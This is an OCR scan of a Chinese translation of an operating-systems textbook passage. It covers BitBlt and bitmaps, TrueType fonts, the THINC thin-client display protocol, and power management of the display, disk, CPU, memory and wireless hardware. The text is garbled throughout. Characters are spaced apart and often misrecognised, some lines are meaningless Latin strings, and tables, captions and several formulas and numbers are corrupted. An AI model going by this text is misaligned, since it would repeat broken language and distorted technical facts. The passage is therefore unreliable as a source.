在 其 最 简单 的 形式 中 ， 该 过 程 从 一 个 窗口 中 的 一 个 矩形 复制 位 图 
到 男 一 个 窗口 (或 同一 个 窗口 ) 的 一 个 矩形 中 。 前 三 个 参数 设 定 目标 
窗口 和 位 置 ， 然 后 是 锡 度 和 高 度 ， 接 下 来 是 源 窗口 和 位 置 。 注 意 ， 每 
个 窗口 都 有 其 自己 的 坐标 系 ， (0，0) 在 窗口 的 左上 角 处 。 最 后 一 个 
参数 将 在 下 面 接 述 。 


BitBlt(hdc2,1,2,5,7,hdcl,2,2,SRCCOPY); 


的 效果 如 图 5-42 所 示 “。 注 意 字母 A 的 整个 5x7 区 域 被 复制 了 ， 包 括 
ERBE o 


除了 复制 位 图 外 ，BitBlt 还 可 以 做 很 多 事情 。 最 后 一 个 参数 提供 了 
执行 布尔 运算 的 可 能 ， 从 而 可 以 将 源 位 图 与 目标 位 图 合并 在 一 起 。 例 
如 ， 源 位 图 可 以 与 目标 位 图 执行 或 运算 ， 从 而 融入 目标 位 图 ; 源 位 图 
还 可 以 与 目标 位 图 执行 异 或 运算 ， 该 运算 保持 了 源 位 图 和 目标 位 图 的 
特征 。 


位 图 具有 的 一 个 问题 是 它们 不 能 缩放 。8x12 方 框 内 的 一 个 字符 在 
640x480 的 显示 器 上 看 起 来 是 适度 的 。 然 而 ， 如 果 该 位 图 以 每 英寸 1200 


点 复制 到 10 200 位 x13 200 位 的 打印 页 面 上 ， 那 么 字符 宽度 (8 像素 ) 为 
8/1200 贡 二 或 0.17mm。 此 外 ， 在 具有 不 同 彩 色 属 性 的 设备 之 间 进 行 复 
制 ， 或 者 在 单 色 设备 与 彩色 设备 之 间 进 行 复 制 效 果 并 不 理想 。 


窗口 


a) b) 


Al 5-42 使 用 BitBlt 复 制 位 图 : a) 复 制 前 ; b) 复 制 后 


由 于 这 样 的 缘故 ，Windows 还 文 持 一 个 称 为 DIB (Device 
Independent Bitmap， 设 备 无 关 的 位 图 ) 的 数据 结构 。 采 用 这 种 格式 的 
文件 使 用 扩展 名 .bmp“。 这 些 文件 在 像素 之 前 具有 文件 与 信息 头 以 及 一 
个 颜色 表 ， 这 样 的 信息 使 得 在 不 同 的 设备 之 间 移 动 位 图 十 分 容易 。 


5. 字 体 


在 Windows 3.1 版 之 前 的 版 本 中 ， 了 字符 表示 为 位 图 ， 并 且 使 用 BitBlt 
复制 到 屏幕 上 或 者 打印 机 上 。 这 样 做 的 问题 是 ， 正 如 我 们 刚刚 看 到 
的 ， 在 屏幕 上 有 意义 的 位 图 对 于 打印 机 来 说 太 小 了 。 此 外 ， 对 于 每 一 


矿 才 的 每 个 字符 ， 需 要 不 同 的 位 图 。 换 句 话 说， 给 定 字符 A 的 10 点 阵 字 
型 的 位 图 ， 没 有 办 法 计算 它 的 12 点 阵 字 型 。 因 为 每 种 字体 的 每 一 个 字 
符 可 能 都 需要 从 4 点 到 120 点 范围 内 的 各 种 扩 寸 ， 所 以 需要 的 位 图 的 数 
目 站 巨大 的 。 人 整个 系统 对 于 文本 来 说 商 直 十 太 举重 了 。 


该 问题 的 解决 办 法 是 TrueType 字 体 的 引入 ，TrueType 字 体 不 是 位 网 
而 是 字符 的 轮廓 。 每 个 TrueType 字 符 是 通过 围绕 其 周 界 的 一 系列 点 来 定 
义 的 ， 所 有 的 点 都 是 相对 于 (0，0) 原点 。 使 用 这 一 系统 ， 放 大 或 者 
缩小 字符 是 十 分 容易 的 ， 必 须要 做 的 全 部 事情 只 是 将 每 个 坐标 乘 以 相 
同 的 比例 因子 。 采 用 这 种 方法 ，TrueType 字 符 可 以 放大 或 者 缩小 到 任意 
的 点 阵 斥 寸 ， 长 至 是 分 数 点 孟 斥 寸 。 一 且 给 定 了 适当 的 太 寸 ， 各 个 点 
可 以 使 用 幼儿 园 教 的 著名 的 逐 点 连 算法 连接 起 来 注意 现代 幼儿 园 为 
了 更 加 光滑 的 结果 而 使 用 曲线 尺 ) 。 轮 廓 完成 之 后 ， 就 可 以 填充 字符 
了 。 图 5-43 给 出 了 某 些 字符 缩放 到 三 种 不 同 点 阵 斥 二 的 一 个 例子 。 
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图 5-43 不 同 点 阵 斥 十 的 字符 轮廓 的 一 些 例子 


一 旦 填充 的 字符 在 数学 形式 上 是 可 用 的 ， 束 可 以 对 它 进行 栅 格 
化 ， 也 整 是 说 ， 以 任何 期 望 的 分 辨 率 将 其 转换 成 位 图 。 通 过 站 先 缩放 
然后 顶 格 化 ， 我 们 可 以 肯定 显示 在 屏幕 上 的 字符 与 出 现在 打印 机 上 的 
字符 将 是 尽 可 能 接近 的 ， 差 别 只 在 于 量化 误差 。 为 了 进一步 改进 质 
量 ， 可 以 在 每 个 字符 中 肉 入 表明 如 何 进 行 栅 格 化 的 线索 。 例 如 ， 了 字母 T 
顶端 的 两 个 衬 线 应 该 是 完全 相同 的 ， 否 则 由 于 舍 入 误差 可 能 束 不 古 这 
样 的 情况 了 。 


[1] Athena (雅典 娜 ) 指 麻 省 理工 学 院 (MIT) 校园 范围 内 基于 UNIX 的 
计算 环境 。 一 _ 译 者 注 


5.7 ”着 客户 机 


多 年 来 ， 主 流 计算 范式 一 直 在 中 心 化 计算 和 分 散 化 计算 之 间 振 
沪 。 最 早 的 计算 机 (例如 ENIAC) 虽然 是 庞然大物 ， 但 实际 上 是 个 人 
计算 机 ， 因 为 一 次 只 有 一 个 人 能 够 使 用 它 。 然 后 出 现 的 是 分 时 系统 ， 
在 分 时 系统 中 许多 远程 用 户 在 简单 的 终端 上 共 孚 一 个 大 型 的 中 心计 算 
机 “。 接 下 来 是 PC 时 代 ， 在 这 一 阶段 用 户 再 次 拥有 他 们 目 己 的 个 人 计算 
机 。 


虽然 分 散 化 的 PC 模型 具有 长 处 ， 但 是 它 也 有 着 某 些 挛 重 的 不 利之 
处 ， 人 们 刚刚 开始 认真 思考 这 些 不 利之 处 。 或 许 最 大 的 问题 是 ， 每 台 
PC 机 都 有 一 个 大 容量 的 硬盘 以 及 复杂 的 软件 必须 维护 。 例 如 ， 当 操作 
系统 的 一 个 新 版 本 发 布 时 ， 必 须 做 大 量 的 工作 分 别 在 每 台 机 右上 进行 
升级 。 在 大 多 数 公司 中 ， 做 这 类 软件 维护 的 劳动 力 成 本 大 大 高 于 实际 
的 硬件 与 软件 成 本 。 对 于 家 性 用 户 而 言 ， 在 技术 上 劳动 力 是 免费 的 ， 
但 是 很 少 有 人 能 够 正确 地 做 这 件 事 ， 并 且 更 少 有 人 乐于 做 这 件 事 。 对 
于 一 个 中 心 化 的 系统 ， 只 有 一 全 或 几 人 台 机 需 必 须 升级 ， 并 且 有 专家 班 
子 做 这 些 工 作 。 


一 个 相关 的 问题 是 ， 用 户 应 该 定期 地 备份 他 们 的 几 吉 字 节 的 文件 
系统 ， 但 是 很 少 有 用 户 这 样 做 。 当 灾难 袭 来 时 ， 相 随 的 将 是 仰天 长 叹 


MIERE o 对 于 一 个 中 心 化 的 系统 ， 目 动 化 的 磁 训 机 天 人 在 每 天 夜 
里 都 可 以 做 备份 。 


中 心 化 系统 的 另 一 个 长 处 是 资源 共享 更 加 容易 。 一 个 系统 具有 256 
个 远程 用 户 ， 每 个 用 户 拥有 256MB RAM， 在 大 多 数 时 间 这 个 系统 的 
这 些 RAM 大 多 是 空 亲 的 ， 然 而 某 些 用 户 临 时 需要 大 量 的 RAM 但 是 却 
得 不 到 ， 因 为 RAM 在 别人 的 PC 上 。 对 于 一 个 具有 64GB RAM 的 中 心 化 
系统 ， 这 样 的 事情 决 不 会 发 生 。 同 样 的 论据 对 于 磁盘 空间 和 其 他 资源 
也 是 有 效 的 。 


最 后 ， 我 们 将 开始 考察 从 以 PC 为 中 心 的 计算 到 以 Web 为 中 心 的 计 
算 的 转移 。 一 个 领域 是 电子 邮件 ， 在 该 领域 中 这 种 转移 是 长 远 的 。 人 
们 过 去 获取 投 送 到 他 们 家 庭 计算 机 上 的 电子 邮件 ， 并 且 在 家 庭 计算 机 
上 阅读 。 今 天 ， 许 多 人 登录 到 Gmail、Hotmail 或 者 Yahoo 上， 并 且 在 那 
里 阅读 他 们 的 邮件 。 下 一 步 人 们 会 登录 到 其 他 网 站 中 ， 进 行 字 处理 、 
建立 电子 数据 表 以 及 做 其 他 过 去 需要 PC 软件 才能 做 的 事情 。 最 后 甚至 
有 可 能 人 们 在 目 己 的 PC 上 运行 的 惟一 软件 是 一 个 Web 浏 览 右 ， 或 许 其 
至 没有 软件 。 


一 个 合理 的 结论 大 概 古 :大 多 数 用 户 想 要 高 性 能 的 交互 式 计算 ， 
但 是 实在 不 想 管理 一 台 计 算 机 。 这 一 结论 导致 斌 究 人 员 重 新 全 究 了 分 
时 系统 使 用 的 哑 终 端 (现在 文雅 地 称 为 瘦 客 户 机 (thin client) ) , € 
们 符合 现代 终端 的 期 望 。X 是 这 一 方 癌 的 一 个 步骤 并 且 专 用 的 X 终 端 一 


度 十 分 流行 ， 但 是 它们 现在 已 经 失宠 ， 因 为 它们 的 价格 与 PC 相仿 ， 能 
做 的 事情 更 少 ， 并 且 仍 然 需要 某 些 软件 维护 。 圣 杯 (holy grail) 应 该 
是 一 个 高 性 能 的 交互 式 计算 系统 ， 在 该 系统 中 用 户 的 机 器 根本 就 没有 
软件 。 十 分 有 趣 的 是 ， 这 一 目标 是 可 以 达到 的 。 下 面 我 们 将 描述 一 个 
这 样 的 瘦 客 户 机 系统 ， 称 为 THINC， 它 是 由 哥伦比亚 大 学 的 研究 人 员 
开发 的 (Baratto 等 人 ，2005; Kim 等 人 ，2006; Lai 和 Nieh，2006) 


此 处 的 基本 思想 是 从 客户 机 剥离 一 切 智能 和 软件 ， 只 是 将 其 用 人 
一 侣 显示器， 使 所 有 计算 (包括 建立 竺 显示 的 位 图 ) 都 在 服务 器 端 完 
成 。 客 户 机 和 服务 器 之 间 的 协议 只 是 通知 显示 融 如 何 更 新 视频 RAML 
再 无 其 他 。 两 逆 之 间 的 协议 中 使 用 了 五 条 命令 ， 它 们 列 在 图 5-44 中 。 


aT 


a 在 给 定 的 位 置 显 示 原 始 像素 数据 
Copy 复制 帧 缓冲 器 区 域 到 指定 的 坐标 


Sfill 以 给 定 的 像素 颜色 值 填 充 一 个 区 域 
Pfill 以 给 定 的 像素 模式 填充 一 个 区 域 
Bitmap 使 用 位 图 图 像 填 充 一 个 区 域 


5-44 THINC 协 议 显 示 命 令 


现在 我 们 将 考察 这 些 命令 。Raw 用 于 传输 像素 数据 并 且 将 它们 逐 
字 地 显示 在 屏幕 上 。 原 则 上 ， 这 是 惟一 需要 的 命令 。 其 他 命令 只 是 为 


TALS 


Copy 指 示 显 示 器 从 其 视频 RAM 的 一 个 部 分 移动 数据 到 男 一 个 首 
分 。 这 对 于 滚 眷 屏 贿 而 不 必 重 新 传输 所 有 数据 是 有 用 的 。 


Sfill 以 单一 的 像素 值 填充 屏 才 的 一 个 区 域 。 许 多 屏幕 具有 某 种 颜 
色 的 一 致 的 背景 ， 该 命令 用 于 目 先 生成 背景 ， 然 后 可 以 绘制 文本 、 图 
标 和 其 他 项 目 。 


Pfill 在 某 个 区 域 上 复制 一 个 模式 。 它 还 可 以 用 于 背景 但 是 某 些 
背景 比 单一 颜色 要 复杂 一 些 ， 在 这 种 情况 下 ， 该 命令 可 以 完成 工作 。 


最 后 ，Bitmap 也 是 用 于 绘制 区 域 , 但 是 具有 前 景色 和 背景 色 。 忆 
而 言 之 ， 这 些 是 非常 简单 的 命令 ， 在 客户 端 需要 非常 少 的 软件 。 所 有 
建立 位 和 铭 填 充 屏 幕 的 复杂 操作 都 是 在 服务 右上 完成 的 。 为 了 改进 效 
率 ， 多 条 命令 可 以 聚集 成 单一 的 数据 包 ， 通 过 网 络 从 服务 右 传 送 到 客 
Pals 


在 服务 器 端 ， 图 形 程序 使 用 高 级 命令 以 绘制 屏幕 。 这 些 命令 被 
THINC 软 件 截 获 ， 并 且 翻 译 成 可 以 发 送 到 客户 机 的 命令 。 命 令 可 能 要 
重 排序 以 改进 效率 。 


论文 通过 在 距 客 户 机 10~10 000km 距 离 的 服务 器 上 运行 众多 的 和 常 
用 应 用 程序 ， 给 出 了 大 量 的 性 能 测量 。 一 般 而 言 ， 性 能 超过 了 其 他 广 
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即使 对 于 实时 视频 也 是 如 此 。 关 于 更 多 的 信息 ， 
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5.8 电源 管理 


第 一 代 通 用 电子 计算 机 ENIAC 具 有 180 00 个 电子 管 并 且 消 耗 140 
000 瓦 的 电力 。 结 果 ， 它 迅速 积累 起 非 同 一 般 的 电费 账单 。 唱 体 管 发 明 
后 ， 电 力 的 使 用 量 戏剧 性 地 下 降 ， 并 且 计 算 机 行业 失去 了 在 电力 需求 
方面 的 兴趣 。 然 而 ， 如 今 电源 管理 由 于 若干 原因 又 像 过 去 一 样 成 为 焦 
点 ， 并 且 操 作 系统 在 这 里 扮演 着 重要 的 角色 。 


我 们 从 桌面 PC 开始 讨论 。 桌 面 PC 通 常 具 有 200 瓦 的 电源 (其 效率 
一 般 是 85%，15% 进 来 的 能 量 损失 为 热量 ) 。 如 果 全 世界 ] 亿 人 台 这 样 的 
机 器 同时 开机 ， 合 起 来 它们 要 用 掉 20 000 焰 瓦 的 电力 。 这 是 20 座 中 等 
规模 的 核电 站 的 总 产 出 。 如 有 果 电 力 需 求 能 够 削减 一 半 ， 我 们 束 可 以 削 
减 10 座 核电 站 。 从 环保 的 角度 看 ， 前 减 10 座 核电 站 《或 等 价 数目 的 矿 
物 燃料 电站 ) 是 一 个 巨大 的 胜利 ， 非 常 值得 追求 。 


另 一 个 要 看 重 考虑 电源 的 场合 是 电池 供电 的 计算 机 ， 包 括 笔记 本 
电脑 、 掌 上 机 以 及 Web 便 释 短 等 。 问 题 的 核心 是 电池 不 能 保存 足够 的 
电荷 以 持续 非 汝 长 的 时 间 ， 至 多 也 殊 是 几 个 小 时 。 此 外 ， 尽 管 电池 公 
司 、 计 算 机 公司 和 消费 性 电子 产品 公司 进行 了 巨大 的 研究 努力 ， 但 进 
展 仍然 缓慢 。 对 于 一 个 已 经 习惯 于 每 18 个 月 性 能 翻 一 番 (摩尔 定律 ) 
的 产业 来 说 ， 受 无 进展 束 像 症 违背 了 物理 定律 ， 但 这 殉 是 现状 。 因 
此 ， 使 计算 机 使 用 较 少 的 能 量 因而 现 有 的 电池 能 够 持续 更 长 的 时 间 就 
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我 们 将 在 下 面 看 到 这 一 点 。 


在 最 低 的 层次 ， 硬 件 广 商 试图 使 他 们 的 电子 装置 具有 更 高 的 能 量 
效率 。 使 用 的 技术 包括 减少 晶体 管 的 尺寸 、 利 用 动态 电压 调 古 、 使 用 
低 摆 幅 并 隔 热 的 总 线 以 及 类 似 的 技术 。 这 些 内 容 超出 了 本 书 的 范围 ， 
感 兴趣 的 读者 可 以 在 Venkatachalam 和 Franz (2005) 的 论文 中 找到 很 好 


的 综述 。 


存在 两 种 减少 能 量 消耗 的 一 般 方法 。 第 一 种 方法 是 当 计算 机 的 某 
些 部 件 (主要 是 VO 设备 ) 不 用 的 时 候 由 操作 系统 关闭 它们 ， 因 为 关闭 
的 设备 使 用 的 能 量 很 少 或 者 不 使 用 能 量 。 第 二 种 方法 是 应 用 程序 使 用 
较 少 的 能 量 ， 这 样 为 了 延长 电池 时 间 可 能 会 降低 用 户 体验 的 质量 。 我 
们 将 依次 看 一 看 这 些 方法 ， 但 是 首先 就 电源 使 用 方面 谈 一 谈 硬 件 设 
计 。 


5.8.1 硬件 问题 


电池 一 般 分 为 两 种 类 型 : 一 次 性 使 用 的 和 可 再 充电 的 。 一 次 性 使 
用 的 电池 (AAA、AA 与 D 电 池 ) 可 以 用 来 运转 掌上 设备 ， 但 是 没有 足 
够 的 能 量 为 具有 大 面积 发 光 屏 幕 的 笔记 本 电脑 供电 。 相 反 ， 可 再 充电 
的 电池 能 够 存储 足够 的 能 量 为 笔记 本 电脑 供电 儿 个 小 时 。 在 可 再 充电 
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可 以 再 充电 ， 但 是 它们 的 容量 同样 非常 有 限 。 


大 多 数 计 算 机 厂商 对 于 电池 市 约 采 取 的 一 般 措施 是 将 CPU、 内 存 
以 及 IO 设备 设计 成 具有 多 种 状态 : 工作、 有 睡眠、 休眠 和 关闭 。 要 使 用 
设备 ， 它 必须 处 于 工作 状态 。 当 设备 在 短 时 间 内 暂时 不 使 用 时 ， 可 以 
将 其 置 于 睡眠 状态 ， 这 样 可 以 减少 能 量 消耗 。 当 设备 在 一 个 较 长 的 时 
间 间 隔 内 不 使 用 时 ， 可 以 将 其 置 于 休眠 状态 ， 这 样 可 以 进一步 减少 能 
量 消 耗 。 这 里 的 权衡 是 ， 使 一 个 设备 脱离 休眠 状态 彰 第 比 使 一 个 设备 
脱离 睡眠 状态 花费 更 多 的 时 间 和 人 能量。 最 后 ， 当 一 个 设备 关闭 时 ， 它 
什么 事情 也 不 做 并 且 也 不 消耗 电能 。 并 非 所 有 的 设备 都 具有 这 些 状 
态 ， 但 是 当 它 们 具有 这 些 状态 时 ， 应 该 由 操作 系统 在 正确 的 时 机 管理 
状态 的 变迁 。 


某 些 计算 机 具有 两 个 甚至 三 个 电源 按钮 。 这 些 按钮 之 一 可 以 将 整 
个 计算 机 置 于 睡 虐 状 态 ， 通 过 键入 一 个 字符 或 者 移动 鼠标 ， 能 够 从 该 
状态 快速 地 唤醒 计算 机 。 男 一 个 按钮 可 以 将 计算 机 置 于 休眠 状态 ， 从 
该 状态 唤醒 计算 机 人 花费 的 时 间 要 长 得 多 。 在 这 两 种 情况 下 ， 这 些 按钮 
通常 除了 发 送 一 个 信号 给 操作 系统 外 什么 也 不 做 ， 剩 下 的 事情 由 操作 
系统 在 软件 中 处 理 。 在 茶 些 国家 ， 依 照 法 律 ， 电 气 设备 必须 具有 一 个 


机 械 的 电源 开关 ， 出 于 安全 性 考虑 ， 该 开关 可 以 切断 电路 并 且 从 设备 
撤去 电能 。 为 了 遵守 这 一 法 律 ， 可 能 需要 为 一 个 开关 。 


电源 管理 提出 了 操作 系统 必须 处 理 的 铬 干 问题 ， 其 中 许多 问题 涉 
资源 休眠 一 一 选择 性 地 、 临 时 性 地 关闭 设备 ， 或 者 至 少 当 它们 空闲 
时 减少 它们 的 功率 消耗 。 必 须 回 答 的 问题 包括 : 哪些 设备 能 够 被 控 
制 ? 它们 是 工作 的 还 是 天 财 的， 或 者 它们 具有 中 间 状 态 吗 ? 在 低 功 耗 
状态 下 市 省 了 多 少 电能 ? 重 局 设备 消耗 能 量 吗 ? 当 进 入 低 功 耗 状态 时 
是 不 是 必须 保存 某 些 上 下 文 ? 返回 到 全 功 耗 状态 要 化 费 多 长 时 间 ? 当 
然 ， 对 这 些 问题 的 回答 是 随 设备 而 变化 的 ， 所 以 操作 系统 必须 能 够 处 
理 一 个 可 能 性 的 范围 。 


许多 研究 人 员 研 究 了 笔记 本 电脑 以 了 解 电 能 的 去 向 。Li 等 人 
(1994) 测量 了 各 种 各 样 的 工作 负 三 ， 得 出 的 结论 如 图 5-45 所 示 。 
Lorch 和 Smith (1998) 在 其 他 机 器 上 进行 了 测量 ， 得 出 的 结论 如 图 5- 
45 所 示 。Weiser 等 人 (1994) 也 进行 了 测量 ， 但 是 没有 发 表 数 值 结 
果 。 这 些 结论 清楚 地 说 明 能 量 吸 收 的 前 三 名 依次 是 显示 器 、 和 硬盘 和 
CPU。 可 能 因为 测量 的 不 同 品牌 的 计算 机 确实 具有 不 同 的 能 量 需求 ， 
这 些 数 字 并 不 紧密 地 吻合 ， 但 是 很 显然 ， 显 示 器 、 硬 副 和 CPU 是 刷 约 


能 量 的 目标 。 


5-45 ”笔记 本 电脑 各 部 件 的 功率 消耗 


5.8.2 ”操作 系统 问题 


操作 系统 在 能 量 管理 上 扮演 着 一 个 重要 的 角色 ， 它 控制 看 所 有 的 
设备 ， 所 以 它 必须 决定 关闭 什么 设备 以 及 何 时 关闭 。 如 有 果 它 关闭 了 一 
个 设备 并 且 该 设备 很 快 再 次 被 用 户 需要 ， 可 能 在 设备 重 局 时 存在 恼人 
的 延迟 。 男 一 方面 ， 如 果 它 等 每 了 太 长 的 时 间 才 关闭 设备 ， 能 量 束 日 
日 地 浪费 了 。 


这 里 的 技巧 是 找到 算法 和 试探 法 ， 证 操作 系统 对 关于 关闭 什么 设 
备 以 及 何 时 关闭 能 够 作出 展 好 的 决策 。 问 题 是 “ 恨 好 ?是 高 度 主观 的 。 
一 个 用 户 可 能 觉得 在 30s 未 使 用 计算 机 之 后 计算 机 要 花费 2s 的 时 间 啊 应 
击 键 是 可 以 接受 的 。 男 一 个 用 户 在 相同 的 条 件 下 可 能 会 发 出 一 连 串 的 
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现在 我 们 来 看 一 看 能 量 预 算 的 儿 大 消耗 者 ， 考 虑 一 下 对 于 它们 能 
够 做 些 什么 。 在 每 个 人 的 能 量 预算 中 最 大 的 项 目 是 显示 融 。 为 了 获得 
明 腕 而 清晰 的 图 像 ， 屏 幕 必 须 是 背光 照明 的 ， 这 样 会 消耗 大 量 的 能 
量 。 许 多 操作 系统 试图 通过 当 几 分 钟 的 时 间 没 有 活动 时 关闭 显示 器 而 
广 省 能 量 。 通 第 用 户 可 以 决定 关闭 的 时 间 间 隅 ， 因 此 将 屏 磊 频繁 地 烛 
灭 和 很 快 用 光电 池 之 间 的 折 中 推 回 给 用 户 〈 用 户 可 能 实际 上 并 不 硕 望 


这 样 ) o RAL Adee “SERIA AS, AAS ER a BE 
设备 移动 时 ， 它 能 够 从 视频 RAM) 即时 地 再 生 。 


Flinn 和 Satyanarayanan (2004) 提出 了 一 种 可 能 的 改进 。 他 们 建议 
让 显示 器 由 奉 干 数目 的 区 域 组 成 ， 这 些 区 域 能 够 独立 地 开启 和 关闭 。 
在 图 5-46 中 ， 我 们 描述 了 16 个 区 域 ， 使 用 虚线 分 开 它 们 。 当 光标 在 窗口 
2 中 的 时 候 ， 如 图 5-46a 所 示 ， 只 有 右 下 角 的 4 个 区 域 必须 点 有 膏 。 其 他 12 
个 区 域 可 以 是 黑暗 的 ， 节 省 了 3/4 的 屏幕 功 耗 。 


当 用 户 移 动 鼠 标 到 窗口 1 时 ， 窗 口 2 的 区 域 可 以 变 暗 并 且 窗 口 1 后 面 
的 区 域 可 以 开启 。 然 而 ， 因 为 窗口 ] 横 跨 9 个 区 域 ， 所 以 需要 更 多 的 电 
能 。 如 果 窗 口 管理 器 能 够 感知 正在 发 生 的 事情 ， 它 可 以 通过 一 种 对 齐 
区 域 的 动作 自动 地 移动 窗口 1 以 适合 4 个 区 域 ， 如 图 5-46b 所 示 。 为 了 达 
到 这 一 从 9/16 全 功率 到 4/16 全 功率 的 缩 碱 ， 窗 口 管理 右 必 须 理解 电源 管 
理 或 者 能 够 从 系统 的 某 些 其 他 做 这 些 工作 的 部 分 接收 指令 。 更 加 复杂 
的 是 能 够 部 分 地 照 亮 不 完全 充满 的 窗口 (例如 ， 包 含 文本 短线 的 窗口 
可 以 在 右手 边 保持 黑暗 ) 。 


图 5-46 针对 育 沧 照明 的 显示 万 使 用 区 域 : a 当 窗口 2 被 选中 时 ， 该 
窗口 不 移动 ，b) 当 窗口 1 被 选中 时 ， 该 窗口 移动 以 减少 照明 的 区 域 的 数 
H 


2. 人 硬盘 


男 一 个 主要 的 价 首 是 硬盘 ， 它 消耗 大 量 的 能 量 以 保持 高 速 旋转 ， 
即使 不 存在 存 取 操 作 。 许 多 计算 机 ， 特 别 是 笔记 本 电脑 ， 在 几 秒 钟 或 
者 几 分 钟 不 活动 之 后 将 停止 磁 强 旋转 。 当 下 一 次 需要 磁盘 的 时 候 ， 磁 
盘 将 再 次 开始 旋转 。 不 幸 的 是 ， 一 个 停止 的 磁 强 是 休眠 而 不 是 睡眠 ， 
因为 要 化 费 相当 多 的 时 间 将 磁 强 再 次 旋转 起 来 ， 导 致 用 户 感到 明显 的 
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此 外 ， 重 新 启动 磁盘 将 消耗 相当 多 额外 的 能 量 。 因 此 ， 每 个 磁盘 
都 有 一 个 特征 时 间 T AWE oP, Ty 通 第 在 5~15s 的 范围 之 
间 。 假 设 下 一 次 磁 副 存 取 预 计 在 未 来 的 茶 个 时 间 t 到 来 。 如 末 t<T4 , BP 
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如 采 t> Ta ， 那 么 使 得 磁盘 停止 而 后 在 较 长 时 间 后 再 次 启动 磁盘 是 十 分 
值得 的 。 如 果 可 以 做 出 民 好 的 预测 〈 例 如 基于 过 去 的 存 取 模 式 ) ， 那 
么 操作 系统 束 能 够 做 出 民 好 的 关闭 预测 并 且 廊 省 能 量 。 实 际 上 ， 大 多 
数 操 作 系统 是 保守 的 ， 往 往 是 在 几 分 钟 不 活动 之 后 才 停 止 磁 强 。 


节省 磁盘 能 量 的 另 一 种 方法 是 在 RAM 中 拥有 一 个 大 容量 的 磁盘 高 
速 缓存 。 如 果 所 需要 的 数据 块 在 高 速 缓存 中 ， 空 闲 的 磁盘 束 不 必 为 满 
足 读 操 作 而 重新 启动。 类 似 地 ， 如 有 果 对 磁盘 的 写 操作 能 够 在 高 速 缓存 
中 缓冲 ， 一 个 停止 的 磁盘 束 不 必 只 为 了 处 理 写 操作 而 重新 启动 。 磁 盘 
可 以 保持 关闭 状态 直到 高 速 缓存 填 满 或 者 读 缺 失 发 生 。 


ERAN WEES Fa A a ioe: 操作 系统 通过 发 送 消息 
或 信号 保持 将 磁盘 的 状态 通知 给 正在 运行 的 程序 。 某 些 程序 具有 可 以 
目 由 决定 的 写 操 作 ， 这 样 的 写 操作 可 以 被 略 过 或 者 推迟 。 例 如 ， 一 个 
字 处 理 程序 可 能 被 设置 成 每 隔 儿 分 钟 将 正在 编辑 的 文件 写 入 磁盘 。 如 
果 字 处 理 程 序 知道 当 它 在 正常 情况 下 应 该 将 文件 写 到 磁盘 的 时 刻 磁 盘 
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直到 某 个 附加 的 时 间 挝 去 。 


3.CPU 


CPU 也 能 够 被 管理 以 节省 能 量 。 笔 记 本 电脑 的 CPU 能 够 用 软件 置 
为 睡眠 状态 ， 将 电能 的 使 用 减少 到 几乎 为 零 。 在 这 一 状态 下 CPU 惟一 
能 做 的 事情 是 当中 断 发 生 时 醒 来 。 因此， 只 要 CPU 变 为 空 几 ， 无 论 是 
因为 等 待 WO 还 是 因为 没有 工作 要 做 ， 它 都 可 以 进入 睡眠 状态 。 


在 许多 计算 机 上 ， 在 CPU 电压 、 时 钟 周期 和 电能 消耗 之 间 存 在 着 
关系 。CPU 电 压 可 以 用 软件 降低 ， 这 样 可 以 节省 能 量 但 是 也 会 (近似 
线性 地 ) 降低 时 钟 速度 。 由 于 电能 消耗 与 电压 的 平方 成 正比 ， 将 电压 
降低 一 半 会 使 CPU 的 速度 减 慢 一 半 ， 而 电能 消耗 降低 到 只 有 1/4。 


对 于 具有 明确 的 最 终 时 限 的 程序 而 言 ， 这 一 特性 可 以 得 到 利用 ， 
例如 多 媒体 观察 瑚 必须 每 40ms 解 压缩 并 显示 一 师 ， 但 是 如 果 它 做 得 太 
RE BLS Be 4328 A) ° (BOXCPUB HAT 40msii té Sx A em, AbA-F 
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总 的 能 量 请 耗 是 x/2 焦 耳 。 作 为 巷 代 ， 它 能 够 以 半 功 率 运 行 并 且 恰 好 满 
足 最 终 时 限 ， 但 是 能 量 消 耗 是 x4 焦 耳 。 以 全 速 和 全 功率 运行 某 个 时 间 
间隔 与 以 半 速 和 四 分 之 一 功率 运行 两 倍 长 时 间 的 比较 如 图 5-47 所 示 。 在 
这 两 种 情况 下 做 了 相同 的 工作 ， 但 是 在 图 5-47b 中 只 消耗 了 一 半 的 能 
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图 5-47 a) 以 全 时 钟 速度 运行 ，b) 电 压 减 半 使 时 钟 速度 前 减 一 半 并 且 
功率 削减 到 1/4 


类 似 地 ， 如 果 用 户 以 每 秒 1 个 字符 的 速度 键入 字符 ， 但 是 处 理 字 符 
所 需 的 工作 要 伦 费 100ms 的 时 间 ， 操 作 系统 最 好 检测 出 长 时 间 的 空闲 周 
期 并 且 将 CPU 放 慢 10 倍 。 简 而 言 之 ， 慢 速 运行 比 快速 运行 具有 更 高 的 


能 量 效率 。 


4. 内 存 


对 于 内 存 ， 存 在 两 种 可 能 的 选择 来 性 省 能 量 。 首 先 ， 可 以 刷新 然 
后 关闭 高 速 缓存 。 高 速 缓存 总 是 能 够 从 内 存 重 狐 加 载 而 不 损失 信息 。 
重新 加 载 可 以 动态 并 且 快 速 地 完成 ， 所 以 关闭 高 速 缓存 是 进入 睡眠 状 
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喘 。 这 种 方法 是 休眠 ， 因 为 实际 上 所 有 到 内 存 的 电能 都 家 切断 了 ， 其 
代价 是 相当 长 的 重新 加 载 时 间 ， 尤 其 是 如 采 磁 盘 也 被 关闭 了 的 话 。 当 


内 存 被 切断 时 ，CPU 或 者 也 被 关闭 ， 或 者 必须 目 ROM 执 行 。 如 果 CPU 
被 关闭 ， 将 其 唤醒 的 中 断 必须 促使 它 跳 转 到 ROM 中 的 代码 ， 从 而 能 够 
重新 加 载 内 存 并 且 使 用 内 存 。 尽 管 存在 所 有 这 些 开销 ， 将 内 存 关闭 较 
长 的 时 间 周 期 (例如 几 个 小 时 ) 也 许 是 值得 的 。 与 常常 要 花费 一 分 钟 
或 者 更 长 时 间 从 磁盘 重新 启动 操作 系统 相 比 ， 在 几 秒 钟 之 内 重新 启动 
内 存 想来 更 加 受 欢迎 。 


5. 无 线 通 信 


越 来 越 多 的 便携 式 计算 机 拥有 到 外 部 世界 《例如 Internet) 的 无 线 
和 连接。 无线 通信 必需 的 无 线 电 发 送 器 和 接收 器 是 头等 的 电能 贪 吃 者 。 
特别 是 ， 如 果 无 线 电 接收 器 为 了 侦 听 到 来 的 电子 邮件 而 始终 开 着 ， 电 
池 可 能 很 快 耗 干 。 男 一 方面 ， 如 琳 无 线 电 设备 在 1 分 钟 空 几 之 后 关闭 ， 
